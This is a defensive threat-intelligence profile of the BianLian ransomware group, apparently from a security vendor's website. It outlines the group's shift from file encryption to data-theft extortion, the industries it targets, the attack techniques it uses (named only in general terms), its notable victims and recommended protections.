Ransomware Group
BianLian
Also known as: BianLian Ransomware
Status: active • First seen 2022-06 • 250+ known victims
BianLian used to encrypt files like other ransomware, but after security researchers released a free decryption tool, they changed tactics. Now they just steal your data without encrypting anything. Their whole game is threatening to leak your sensitive files unless you pay. It's pure blackmail without the ransomware.
Overview
BianLian is a ransomware group that shifted from traditional encryption-based attacks to pure data extortion in 2023. After a decryptor was released, they pivoted to stealing data without encrypting, focusing entirely on threatening to leak sensitive information unless paid.
Target Industries
Healthcare, Legal Services, Manufacturing, Professional Services, Financial Services, Education
How They Attack
- • Exploiting vulnerable RDP services
- • Exploiting ProxyShell vulnerabilities
- • Using valid VPN credentials
- • Living-off-the-land with PowerShell and WMI
- • Data exfiltration via rclone and Mega.io
Notable Victims
Air Canada (2023), Multiple US law firms, Various healthcare organizations, Numerous professional services firms
Is your business exposed?
How to Protect Against BianLian
- 1.
Patch ProxyShell vulnerabilities on Exchange servers
- 2.
Monitor for rclone and Mega.io cloud sync tools
- 3.
Block unauthorized cloud storage services
- 4.
Implement enhanced PowerShell logging
- 5.
Download free BianLian decryptor (for older variants)
Avast BianLian Decryptor
MITRE ATT&CK Techniques
Is your business exposed?
Check if your company data is circulating on the dark web
Free scan • No credit card required